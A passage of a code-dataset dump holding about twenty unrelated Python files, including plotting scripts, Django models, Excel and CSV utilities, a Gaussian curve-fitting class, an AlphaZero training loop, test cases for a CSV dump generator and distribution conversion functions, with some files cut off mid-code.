ax.yaxis.set_major_locator(ticker.MultipleLocator(10.0))\n ax.yaxis.set_minor_locator(ticker.MultipleLocator(5.0))\n \n cbax = figure.add_axes([0.87, 0.2, 0.02, 0.7])\n formatter = ticker.FormatStrFormatter(\"%.0f\")\n colorbar = pyplot.colorbar(im, cax=cbax, ticks=self.velContours, format=formatter)\n colorbar.set_label(\"Vp (m/s)\")\n\n filename = \"{}-vert_slice-{}_vp.png\".format(domain, label)\n figure.savefig(os.path.join(\"plots\", filename), pad_inches=0.02)\n pyplot.close(figure) \n return\n \n def initialize(self, filenames, keep_case=True, verbose=False):\n \"\"\"Get configuration from .cfg files.\n \n Args:\n filenames (list)\n List of .cfg files to read.\n keep_case (bool)\n If True, maintain case in section headings, otherwise convert to lowercase.\n verbose (bool)\n If True, print out progress.\n\n Returns:\n Dictionary with configuration.\n \"\"\"\n config = configparser.ConfigParser()\n if keep_case:\n config.optionxform = str\n for filename in filenames:\n if not os.path.isfile(filename):\n raise IOError(\"Could not find configuration file '{}'.\".format(filename))\n if verbose:\n print(\"Fetching parameters from {}...\".format(filename))\n config.read(filename)\n self.config = {s: dict(config.items(s)) for s in config.sections()}\n \n def show_parameters(self):\n \"\"\"Write parameters to stdout.\n \"\"\"\n import sys\n parser = configparser.ConfigParser()\n parser.read_dict(self.config)\n parser.write(sys.stdout)\n\n def _parseCommandLine(self):\n \"\"\"Parse command line arguments.\n \"\"\"\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", action=\"store\", dest=\"config\", required=True)\n parser.add_argument(\"--show-parameters\", action=\"store_true\", dest=\"show_parameters\")\n parser.add_argument(\"--query\", action=\"store_true\", dest=\"query\")\n parser.add_argument(\"--plot-hslices\", action=\"store_true\", dest=\"plot_hslices\")\n parser.add_argument(\"--plot-vslices\", action=\"store_true\", dest=\"plot_vslices\")\n parser.add_argument(\"--quiet\", action=\"store_false\", dest=\"show_progress\", default=True)\n parser.add_argument(\"--debug\", action=\"store_true\", dest=\"debug\", default=True)\n return parser.parse_args()\n\n# ======================================================================\nif __name__ == \"__main__\":\n SlicesApp().main()\n\n# End of file\n","sub_path":"slices/slicer.py","file_name":"slicer.py","file_ext":"py","file_size_in_byte":18057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185239141","text":"# Program extracting all columns \n# name in Python \nimport xlrd \n\nimport codecs\n\nloc = (\"data.xlsx\") \n \nwb = xlrd.open_workbook(loc) \n\n#################################\n# sheet_names = wb.sheet_names()\n# f = codecs.open(\"out.txt\",\"w\",\"utf8\")\n# for name in sheet_names:\n# \tf.write(name + \"\\n\")\n# f.close() \n################################\n\nsheet_name = \"ぐるなび\"\nsheet = wb.sheet_by_name(sheet_name)\n\nf = codecs.open(\"outX.xlsx\",\"w\",\"utf8\")\n\nfor i in range(2,sheet.nrows):\n\t# for j in range(sheet.ncols):\n\tname = str(sheet.cell(i,4).value) + \",\"\n\t\n\tif sheet.cell(i,11).value == xlrd.empty_cell.value:\n\t\tname += str(sheet.cell(i,10).value)\n\telse:\n\t\tname += str(sheet.cell(i,11).value)\n\n\tf.write(name)\n\tf.write(\"\\n\")\n\t\t\nf.close() 
\n","sub_path":"readExcel.py","file_name":"readExcel.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"263955989","text":"import threading\nimport time\n\nclass Hilo(threading.Thread):\n # proceso a ejecutar\n def run(self):\n print(\"{} Incio\".format(self.getName()) )\n time.sleep(1)\n print(\"{} Terminado\".format(self.getName()))\n\n# Los hilos cuando se terminan , simplemente dejan de ejecutar\n\nif __name__ == '__main__':\n for x in range(9):\n hilo = Hilo(name=\"Hilo - {}\".format(x+1))\n # para inciar los hilos en python hay que indicar\n hilo.start() # start indica la ejecución\n time.sleep(.5)\n\n \n\n","sub_path":"core/hilos/ed_team/Second.py","file_name":"Second.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"42642608","text":"guide = {\"merry\":\"god\", \"christmas\":\"jul\", \"and\":\"och\", \"happy\":\"gott\", \"new\":\"nytt\", \"year\":\"år\"}\nk = guide.keys()\nsm=[]\nflag = 0\nintext = input(\"Enter the text=\").split()\n#print (intext)\nfor i in intext:\n if(i in k):\n sm.append(guide[i])\n #print (\"swidden message=\",sw)\n else:\n flag = 1\n break\nif(flag == 0):\n print (\"swidden message=\",\" \".join(sm))\nelse:\n print(\"oops..... insert valid input......\")\n","sub_path":"Exercises/Urvi/Collections and Iterations/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"488943674","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/www.django/makarthy/codenerix_extensions/files/models.py\n# Compiled at: 2017-04-28 08:28:21\n# Size of source mod 2**32: 2198 bytes\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db import models\nfrom codenerix.lib.helpers import upload_path\nfrom codenerix.fields import FileAngularField, ImageAngularField\n\nclass GenDocumentFile(models.Model):\n doc_path = FileAngularField(_('Doc Path'), upload_to=upload_path, max_length=200, blank=False, null=False)\n name_file = models.CharField(_('Name'), max_length=254, blank=False, null=False)\n\n class Meta:\n abstract = True\n\n\nclass GenDocumentFileNull(models.Model):\n doc_path = FileAngularField(_('Doc Path'), upload_to=upload_path, max_length=200, blank=True, null=True)\n name_file = models.CharField(_('Name'), max_length=254, blank=True, null=True)\n\n class Meta:\n abstract = True\n\n\nclass GenImageFile(models.Model):\n image = ImageAngularField(_('Image'), upload_to=upload_path, max_length=200, blank=False, null=False)\n name_file = models.CharField(_('Name'), max_length=254, blank=True, null=True)\n\n class Meta:\n abstract = True\n\n\nclass GenImageFileNull(models.Model):\n image = ImageAngularField(_('Image'), upload_to=upload_path, max_length=200, blank=True, null=True)\n name_file = models.CharField(_('Name'), max_length=254, blank=True, null=True)\n\n class Meta:\n abstract = True","sub_path":"pycfiles/django_codenerix_extensions-1.0.17-py2.py3-none-any/models.cpython-35.py","file_name":"models.cpython-35.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"148028622","text":"#!/usr/bin/env python\n\nimport sys\n\nfilter_file = 
sys.argv[1]\n\nwith open(filter_file) as f:\n    linefilter = set([l.strip() for l in f.readlines() if l.strip()])\n\nfor line in sys.stdin:\n    if line.split()[0] in linefilter:\n        print(line.strip(\"\\n\"))\n","sub_path":"static_data/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"91404999","text":"import cv2\nmask_image = cv2.imread('d:/data/mask_circle.png')\nback_image = cv2.imread('d:/data/iceberg.png')\nmask_image = cv2.resize(mask_image, (300,400))\nback_image = cv2.resize(back_image, (300,400))\n\nmask_ANDed = cv2.bitwise_and(mask_image, back_image)\nmask_ORed = cv2.bitwise_or(mask_image, back_image)\nmask_XORed = cv2.bitwise_xor(mask_image, back_image)\n\ncv2.imshow('mask', mask_image)\ncv2.imshow('back', back_image)\ncv2.imshow('mask and', mask_ANDed)\ncv2.imshow('mask or', mask_ORed)\ncv2.imshow('mask xor', mask_XORed)\n\n# The next two lines wait for a key press, then close all windows and exit\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"deu/python and data science/PJH13-4.py","file_name":"PJH13-4.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"90302835","text":"class choice:\n    REGION_CHOICES = (\n        ('srilanka', 'Sri Lanka'),\n        ('jaffna', 'Jaffna'),\n        ('idaikkadu', 'Idaikkadu'),\n        ('australia', 'Australia'),\n        ('canada', 'Canada'),\n        ('swiss', 'Swiss'),\n        ('uk', 'UK'),\n        ('europe', 'Europe'),\n        ('middleeast', 'Middle East'),\n        ('asia', 'Asia'),\n    )\n\n    MENU_CHOICES = (\n        ('News', 'News'),\n        ('Obituary', 'Obituary'),\n        ('School', 'School'),\n        ('Story', 'Story'),\n        ('Association', 'Association'),\n        ('Article', 'Article'),\n        ('Thankyou', 'Thankyou'),\n        ('Temple', 'Temple'),\n        ('Library', 'Library'),\n        ('Wedding', 'Wedding'),\n        ('Invitation', 'Invitation'),\n        ('Other', 'Other'),\n    )\n\n    SECTION_CHOICES = (\n        ('F', 'International'),\n        ('I', 'Idaikkadu'),\n        ('S', 'Srilanka'),\n    )\n\n    APPROVAL_CHOICES = (\n        ('Y', 'Yes'),\n        ('N', 'No'),\n    )\n","sub_path":"web/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"603129333","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os.path\n\ndef map_k_precision(truthvalues, predictions):\n    '''\n    This is a faster implementation of MAP@k valid for numpy arrays.\n    It is only valid when there is one single truth value.\n\n    m ~ number of observations\n    k ~ MAP at k -- in this case k should equal 3\n\n    truthvalues.shape = (m,)\n    predictions.shape = (m, k)\n    '''\n    z = (predictions == truthvalues[:, None]).astype(np.float32)\n    weights = 1./(np.arange(predictions.shape[1], dtype=np.float32) + 1.)\n    z = z * weights[None, :]\n    return np.mean(np.sum(z, axis=1))\n\ndef main():\n    assert(os.path.isfile(sys.argv[1]))\n    df_train = pd.read_csv('../input/train.csv')\n\n    with open(sys.argv[1], 'r') as fh:\n        lines=fh.readlines()[1:]\n\n    truthvalues = np.zeros(len(lines), dtype=np.int64)\n    predictions = np.zeros((len(lines), 3), dtype=np.int64)\n\n    for i, line in enumerate(lines):\n        row_id, placeids = line.strip().split(',')\n        row_id = int(row_id)\n\n        placeids = np.array([int(x) for x in placeids.split()], \n            dtype=np.int64)\n\n        truthvalues[i] = df_train.place_id.values[row_id]\n        predictions[i] = placeids\n\n\n    print(map_k_precision(truthvalues, predictions))\n    \n    pass\n\nif __name__ == 
'__main__':\n main()","sub_path":"validation_score.py","file_name":"validation_score.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"251322467","text":"import re\n\nfrom html_page import HtmlPage\nimport exceptions\n\n\nclass AnimePages(HtmlPage):\n \"\"\"List of all anime pages URL\"\"\"\n def __init__(self, url):\n super(AnimePages, self).__init__(url)\n match = re.search(' abs(np.min(yy-const_0)):\n scale_0 = self.scale_0 = np.max(yy)-const_0\n mean_0 = self.mean_0 = np.squeeze(xx[np.argmax(yy)])\n else:\n scale_0 = self.scale_0 = np.min(yy)-const_0\n mean_0 = self.mean_0 = np.squeeze(xx[np.argmin(yy)])\n\n mask_above_half = yy-const_0 > scale_0/2\n\n if np.sum(mask_above_half) > 1:\n sigma_0 = abs(xx[mask_above_half][-1] - xx[mask_above_half][0])/factor_fwhm\n else:\n sigma_0 = 1\n\n self.sigma_0 = sigma_0\n\n if fit_const:\n p0 = self.p0 = [scale_0, mean_0, sigma_0, const_0]\n else:\n p0 = self.p0 = [scale_0, mean_0, sigma_0]\n else:\n self.p0 = p0\n if fit_const:\n self.scale_0, self.mean_0, self.sigma_0, self.const_0 = p0\n else:\n self.scale_0, self.mean_0, self.sigma_0 = p0\n self.const_0 = 0\n\n try:\n self.popt, self.pcov = curve_fit(self.fit_func, xx, yy, p0=p0, jac=self.jacobi, maxfev=100)\n except RuntimeError:\n try:\n p0[2] *= 5\n self.popt, self.pcov = curve_fit(self.fit_func, xx, yy, p0=p0, jac=self.jacobi, maxfev=100)\n except RuntimeError as e:\n if raise_:\n raise\n self.popt, self.pcov = p0, np.ones([len(p0), len(p0)], float)\n if print_:\n print(e)\n print('Fit did not converge. Using p0 instead!')\n\n if fit_const:\n self.scale, self.mean, self.sigma, self.const = self.popt\n else:\n self.scale, self.mean, self.sigma = self.popt\n self.const = 0\n self.sigma = abs(self.sigma)\n self.reconstruction = self.fit_func(xx, *self.popt)\n self.fit_integral = self.scale*self.sigma*np.sqrt(2*np.pi)\n\n if print_:\n print(p0, '\\t\\t', self.popt)\n\n @staticmethod\n def fit_func(xx, scale, mean, sig, const=0):\n #return scale*stats.norm.pdf(xx, mean, sig)\n if sig != 0:\n return scale*np.exp(-(xx-mean)**2/(2*sig**2))+const\n else:\n return 0\n\n def jacobi(self, xx, scale, mean, sig, const=0):\n g_minus_const = self.fit_func(xx, scale, mean, sig, 0)\n if scale == 0:\n self.jacobi_arr[:,0] = 0\n else:\n self.jacobi_arr[:,0] = g_minus_const/scale\n if sig != 0:\n self.jacobi_arr[:,1] = g_minus_const * (xx-mean)/sig**2\n self.jacobi_arr[:,2] = g_minus_const * (xx-mean)**2/sig**3\n else:\n self.jacobi_arr[:,1] = self.jacobi_arr[:,2] = np.inf\n\n return self.jacobi_arr\n\n def plot_data_and_fit(self, sp):\n sp.plot(self.xx, self.yy, label='Data', marker='.')\n xx2 = np.linspace(self.xx[0], self.xx[-1], 100)\n reconstruction2 = self.fit_func(xx2, *self.popt)\n sp.plot(xx2, reconstruction2, label='Reconstruction', marker='.', ls='--')\n sp.axhline(self.scale_0+self.const_0, label='scale_0+const_0', color='black')\n sp.axhline(self.scale+self.const, label='scale+const', color='black', ls='--')\n\n sp.axhline(self.const_0, label='const_0', color='black')\n sp.axhline(self.const, label='const', color='black', ls='--')\n\n sp.axvline(self.mean_0, label='mean_0', color='red')\n sp.axvline(self.mean, label='mean', color='red', ls='--')\n\n sp.axvline(self.mean_0-self.sigma_0, label='sigma_0', color='green')\n sp.axvline(self.mean_0+self.sigma_0, color='green')\n sp.axvline(self.mean-self.sigma, label='sigma', color='green', ls='--')\n sp.axvline(self.mean+self.sigma, color='green', 
ls='--')\n        sp.legend()\n\n","sub_path":"gaussfit.py","file_name":"gaussfit.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"434288410","text":"# -*- coding:UTF-8 -*-\nfrom bs4 import BeautifulSoup\nimport requests\n\nif __name__ == '__main__':\n    target = 'https://www.juzikong.com/collections/2707751a-63c1-4115-9986-ee91d2363680'\n    req = requests.get(url=target)\n    req.encoding = 'GBK' # set encoding to 'GBK' to fix garbled Chinese text\n    soup = BeautifulSoup(req.text, 'lxml')\n    print(\"soup\",soup)\n    # texts = soup.find_all('div', class_='showtxt')\n    # print(texts[0].text.replace('\\xa0'*8, '\\n\\n'))\n\n\n","sub_path":"python/nicai.py","file_name":"nicai.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"176891376","text":"import asyncio\nimport functools\n\nfrom . import parsers\n\n\n__all__ = ()\n\n\nreject = (None,)\n\n\nskip = reject.__contains__\n\n\ndef apply(first, *checks, skip = skip):\n\n    def execute(*args):\n\n        value = first(*args)\n\n        if not skip or not skip(value):\n\n            for check in checks:\n\n                check(value)\n\n        return value\n\n    return execute\n","sub_path":"strdata/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"125171633","text":"import glob\nimport os\nimport pickle\nimport time\nimport numpy as np\nimport tensorflow as tf\n\nfrom config import AlphaZeroConfig\nfrom network import Network\n\nCONFIG = AlphaZeroConfig()\n\ndef sample_batch(buffer_dir):\n\n    # Get last N pickled elements and append them to a list\n    glob_pattern = os.path.join(buffer_dir, '*[0-9].pickle')\n    file_list = sorted(glob.glob(glob_pattern, recursive=False))\n    num_samples = min(len(file_list), CONFIG.buffer_max_size)\n    game_list = []\n\n    for name in file_list[-num_samples:]:\n        with open(name, 'rb') as f:\n            game_list.append(pickle.load(f))\n    games = np.random.choice(game_list, size=CONFIG.batch_size)\n    game_pos = [(g, np.random.randint(len(g[\"mol_smiles\"])-1)) for g in games]\n\n    mol = [z[\"network_inputs\"][\"mol\"][i] for (z, i) in game_pos]\n    next_mols = [z[\"network_inputs\"][\"next_mols\"][i] for (z, i) in game_pos]\n    action_mask = [z[\"network_inputs\"][\"action_mask\"][i] for (z, i) in game_pos]\n\n    pi = [z[\"network_inputs\"][\"pi\"][i] for (z, i) in game_pos]\n\n    # Get ranked reward threshold over the entire buffer\n    rewards = [z[0][\"reward\"] for z in game_pos]\n    r_alpha = np.percentile(rewards, 100.*CONFIG.ranked_reward_alpha)\n\n    # Compute the ranked reward for each sampled game\n    v = []\n    for (z, _) in game_pos:\n        value = z[\"reward\"]\n        if value < r_alpha:\n            rr = -1.\n        elif value > r_alpha:\n            rr = 1.\n        else:\n            rr = np.random.choice([-1., 1.])\n        v.append(rr)\n    \n    return mol, next_mols, action_mask, v, pi\n\ndef train_model(network, buffer_dir, model_dir):\n    for iteration in range(CONFIG.training_iterations):\n        mol, next_mols, action_mask, v, pi = sample_batch(buffer_dir)\n        #for gs in range(CONFIG.gradient_steps_per_batch):\n        #loss = network.model.train_on_batch([mol, next_mols, action_mask], [v, pi])\n        checkpoint_filepath = os.path.join(model_dir,'cp.ckpt')\n        cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_filepath,\n                                                         save_weights_only=True,\n                                                         save_best_only=False,\n                                                         verbose=0\n                                                         )\n        history = network.model.fit([np.asarray(mol), np.asarray(next_mols), 
np.asarray(action_mask)], \n [np.asarray(v), np.asarray(pi)],\n epochs=CONFIG.gradient_steps_per_batch,\n callbacks=[cp_callback],\n verbose=0)\n network.model.save_weights(checkpoint_filepath)\n #network.model.save(os.path.join(model_dir,'model_{}.h5'.format(time.strftime(\"%Y%m%d-%H%M%S\"))))\n\nif __name__ == \"__main__\":\n\n current_path = os.getcwd()\n buffer_dir = os.path.join(current_path, 'pickled_objects')\n model_dir = os.path.join(current_path, 'saved_models')\n\n network = Network(model_dir)\n network.compile()\n train_model(network, buffer_dir, model_dir)","sub_path":"molecule_builder/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195227752","text":"def split (string, symbol):\n l = []\n start = 0\n i = 0\n for char in string:\n if char == symbol:\n if start < i:\n l.append(string[start:i])\n i += 1\n start = i\n else:\n i += 1\n if start < i:\n l.append(string[start:i])\n return l\n\n\nif __name__ == '__main__':\n print(split('dsafgad fdsaf ads dsaf fagda fdfs ', ' '))\n","sub_path":"python/algorithms/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"359078931","text":"#! coding: utf-8\nimport io\nimport json\nimport os\nimport csv\nimport zipfile\n\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom django.test import TestCase\nfrom django_datajsonar.models import Field, Node\n\nfrom series_tiempo_ar_api.libs.indexing.elastic import ElasticInstance\nfrom series_tiempo_ar_api.apps.management import meta_keys\nfrom series_tiempo_ar_api.apps.dump.csv import CSVDumpGenerator\nfrom series_tiempo_ar_api.apps.dump.models import CSVDumpTask\nfrom series_tiempo_ar_api.apps.dump import constants\nfrom series_tiempo_ar_api.utils import index_catalog\n\n\nsamples_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'samples')\n\n\nclass CSVTest(TestCase):\n index = 'csv_dump_test_index'\n # noinspection PyUnresolvedReferences\n directory = os.path.join(settings.MEDIA_ROOT, 'test_dump')\n\n @classmethod\n def setUpClass(cls):\n super(CSVTest, cls).setUpClass()\n cls.catalog_id = 'csv_dump_test_catalog'\n path = os.path.join(samples_dir, 'distribution_daily_periodicity.json')\n index_catalog(cls.catalog_id, path, cls.index)\n cls.task = CSVDumpTask()\n cls.task.save()\n gen = CSVDumpGenerator(cls.task, index=cls.index, output_directory=cls.directory)\n gen.generate()\n\n def test_values_dump(self):\n file = self.task.dumpfile_set.get(file_name=constants.VALUES_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # skip header\n row = next(reader)\n self.assertEqual(row[0], self.catalog_id)\n self.assertEqual(row[6], 'R/P1D')\n\n def test_values_length(self):\n file = self.task.dumpfile_set.get(file_name=constants.VALUES_CSV).file\n file.open('r')\n reader = csv.reader(file)\n header = next(reader)\n self.assertEqual(len(header), 7)\n\n def test_entity_identifiers(self):\n file = self.task.dumpfile_set.get(file_name=constants.VALUES_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader)\n\n row = next(reader)\n\n field_id = row[3]\n field = Field.objects.get(identifier=field_id)\n\n self.assertEqual(self.catalog_id, row[0])\n self.assertEqual(field.distribution.identifier, row[2])\n self.assertEqual(field.distribution.dataset.identifier, row[1])\n 
self.assertEqual(row[6], field.distribution.enhanced_meta.get(key=meta_keys.PERIODICITY).value)\n\n def test_full_csv_zipped(self):\n path = self.task.dumpfile_set.get(file_name=constants.FULL_CSV_ZIPPED).file.path\n csv_zipped = zipfile.ZipFile(path)\n\n # Necesario para abrir archivos zippeados en modo texto (no bytes)\n src_file = io.TextIOWrapper(csv_zipped.open(constants.FULL_CSV),\n encoding='utf8',\n newline='')\n reader = csv.reader(src_file)\n\n header = next(reader)\n\n self.assertEqual(len(header), 15)\n\n def test_full_csv_identifier_fields(self):\n file = self.task.dumpfile_set.get(file_name=constants.FULL_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # Header\n\n row = next(reader)\n\n field = Field.objects.get(identifier=row[3])\n self.assertEqual(row[0], self.catalog_id)\n self.assertEqual(row[1], field.distribution.dataset.identifier)\n self.assertEqual(row[2], field.distribution.identifier)\n self.assertEqual(row[5], field.distribution.enhanced_meta.get(key=meta_keys.PERIODICITY).value)\n\n def test_full_csv_metadata_fields(self):\n file = self.task.dumpfile_set.get(file_name=constants.FULL_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # Header\n\n row = next(reader)\n\n field = Field.objects.get(identifier=row[3])\n\n field_meta = json.loads(field.metadata)\n distribution_meta = json.loads(field.distribution.metadata)\n self.assertEqual(row[7], field.title)\n self.assertEqual(row[8], field_meta['units'])\n self.assertEqual(row[9], field_meta['description'])\n self.assertEqual(row[10], distribution_meta['description'])\n\n def test_full_csv_dataset_metadata_fields(self):\n file = self.task.dumpfile_set.get(file_name=constants.FULL_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # Header\n\n row = next(reader)\n\n field = Field.objects.get(identifier=row[3])\n\n dataset_meta = json.loads(field.distribution.dataset.metadata)\n self.assertEqual(row[12], dataset_meta['publisher']['name'])\n self.assertEqual(row[13], dataset_meta['source'])\n self.assertEqual(row[14], field.distribution.dataset.title)\n\n def test_full_csv_dataset_theme_field(self):\n file = self.task.dumpfile_set.get(file_name=constants.FULL_CSV).file\n file.open('r')\n reader = csv.reader(file)\n next(reader) # Header\n\n row = next(reader)\n\n field = Field.objects.get(identifier=row[3])\n\n dataset_meta = json.loads(field.distribution.dataset.metadata)\n\n themes = json.loads(Node.objects.get(catalog_id=self.catalog_id).catalog)['themeTaxonomy']\n\n theme_label = ''\n for theme in themes:\n if theme['id'] == dataset_meta['theme'][0]:\n theme_label = theme['label']\n break\n\n self.assertEqual(theme_label, row[11])\n\n @classmethod\n def tearDownClass(cls):\n ElasticInstance.get().indices.delete(cls.index)\n Node.objects.all().delete()\n\n\nclass CSVDumpCommandTests(TestCase):\n index = 'csv_dump_cmd_test_index'\n\n @classmethod\n def setUpClass(cls):\n super(CSVDumpCommandTests, cls).setUpClass()\n ElasticInstance.get().indices.create(cls.index)\n\n def setUp(self):\n CSVDumpTask.objects.all().delete()\n\n def test_command_creates_model(self):\n call_command('generate_dump', index=self.index)\n self.assertEqual(CSVDumpTask.objects.count(), 1)\n\n task = CSVDumpTask.objects.first()\n self.assertTrue(task.dumpfile_set.count(), task.logs)\n\n @classmethod\n def tearDownClass(cls):\n 
ElasticInstance.get().indices.delete(cls.index)\n","sub_path":"series_tiempo_ar_api/apps/dump/tests/csv_generator_tests.py","file_name":"csv_generator_tests.py","file_ext":"py","file_size_in_byte":6268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"296593303","text":"import numpy as np\nimport pandas as pd\nimport sys\n\nclass _BasicDataGenerator():\n def __init__(self):\n self.n_rows = None\n self.n_cols = None\n self.seed = None\n \n def generate(self,n_rows = 100, n_cols = 10, seed = None):\n self.n_rows = n_rows\n self.n_cols = n_cols\n if seed is None:\n self.seed = np.random.randint(0, 420000)\n else:\n self.seed = seed\n\nclass MatrixGenerator(_BasicDataGenerator):\n def __init__(self):\n super().__init__()\n \n def _generate_basic_dataset(self, loc = 0, scale = 1):\n np.random.seed(seed = self.seed)\n X = np.random.normal(loc = loc, scale = scale, size = (self.n_rows,self.n_cols))\n y = np.random.binomial(1, np.exp(X.sum(axis=1))/(1+np.exp(X.sum(axis=1))))\n return X,y\n\n def _generate_noise(self, sigma_min, sigma_max, loc = 0):\n np.random.seed(seed = self.seed)\n noise_sigmas = np.random.uniform(sigma_min, sigma_max, size = self.n_cols)\n noise = np.random.normal(loc = loc, scale = noise_sigmas, size = (self.n_rows,self.n_cols))\n return noise, noise_sigmas\n\n def generate(self,n_rows = 100, n_cols = 10, loc = 0, noise_sigma_range = (0,1), seed = None, round_level = None):\n assert isinstance(n_rows, int), \"Argument `n_rows` must be int.\"\n assert isinstance(n_cols, int), \"Argument `n_cols` must be int.\"\n assert isinstance(loc, int), \"Argument `loc` must be int or float.\"\n assert isinstance(noise_sigma_range, tuple) and len(noise_sigma_range) == 2, \"Argument `noise_sigma_man_std` must be tuple of length 2.\"\n\n super().generate(n_rows, n_cols, seed)\n np.random.seed(seed = self.seed)\n\n self.loc = 0\n self.noise_sigma_min = noise_sigma_range[0]\n self.noise_sigma_max = noise_sigma_range[1]\n\n # Generate basic dataset\n X,y = self._generate_basic_dataset(loc=0, scale=1)\n # Generate noise\n noise, noise_sigmas = self._generate_noise(sigma_min=self.noise_sigma_min, sigma_max=self.noise_sigma_max)\n X_transformed = X + noise\n\n # Calculate costs\n costs = 1/noise_sigmas\n\n # Round output if selected\n if round_level:\n X_transformed = X_transformed.round(round_level)\n \n return X_transformed, y, list(costs)\n\nclass DataFrameGenerator(MatrixGenerator):\n def __init__(self):\n super().__init__()\n\n def _generate_colnames(self, n):\n new_cols = ['var_' + str(i) for i in np.arange(1,n+1)]\n return new_cols\n\n def generate(self,n_rows = 100, n_cols = 10, loc = 0, noise_sigma_range = (0,1), seed = None, round_level = None):\n X,y,costs = super().generate(n_rows = n_rows, n_cols = n_cols, loc = loc, noise_sigma_range = noise_sigma_range, seed = seed, round_level = round_level)\n # Generate colnames\n cols = self._generate_colnames(self.n_cols)\n\n # Zip costs\n costs_dict = dict(zip(cols,costs))\n\n # Create final data frame\n X_df = pd.DataFrame(X, columns = cols)\n y_series = pd.Series(y)\n\n return X_df, y_series, costs_dict","sub_path":"bcselector/data_generation.py","file_name":"data_generation.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"210840394","text":"\"\"\"This module implements functions to convert distributions between various representations\nThese functions should then be registered with the 
`qp.ConversionDict` using `qp_add_mapping`.\nThat will allow the automated conversion mechanisms to work.\n\"\"\"\nimport numpy as np\nfrom scipy import integrate as sciint\nfrom scipy import interpolate as sciinterp\n\nfrom .lazy_modules import mixture\nfrom .sparse_rep import (build_sparse_representation, decode_sparse_indices,\n                         indices2shapes)\n\n\ndef extract_vals_at_x(in_dist, **kwargs):\n    \"\"\"Convert using a set of x and y values.\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    xvals : `np.array`\n        Locations at which the pdf is evaluated\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data\n    \"\"\"\n    xvals = kwargs.pop('xvals', None)\n    if xvals is None: # pragma: no cover\n        raise ValueError(\"To convert using extract_vals_at_x you must specify xvals\")\n    yvals = in_dist.pdf(xvals)\n    return dict(xvals=xvals, yvals=yvals)\n\n\ndef extract_xy_vals(in_dist, **kwargs):\n    \"\"\"Convert using a set of x and y values.\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    xvals : `np.array`\n        Locations at which the pdf is evaluated\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data\n    \"\"\"\n    xvals = kwargs.pop('xvals', None)\n    if xvals is None: # pragma: no cover\n        raise ValueError(\"To convert using extract_xy_vals you must specify xvals\")\n    yvals = in_dist.pdf(xvals)\n    expand_x = np.ones(yvals.shape) * np.squeeze(xvals)\n    return dict(xvals=expand_x, yvals=yvals)\n\n\ndef extract_samples(in_dist, **kwargs):\n    \"\"\"Convert using a set of values sampled from the PDF\n\n    Parameters\n    ----------\n    in_dist : `qp.Ensemble`\n        Input distributions\n\n    Other Parameters\n    ----------------\n    size : `int`\n        Number of samples to generate\n\n    Returns\n    -------\n    data : `dict`\n        The extracted data\n    \"\"\"\n    samples = in_dist.rvs(size=kwargs.pop('size', 1000))\n    xvals = kwargs.pop('xvals')\n    return dict(samples=samples, xvals=xvals, yvals=None)\n\n\ndef extract_hist_values(in_dist, **kwargs):\n    \"\"\"Convert by histogramizing the PDF 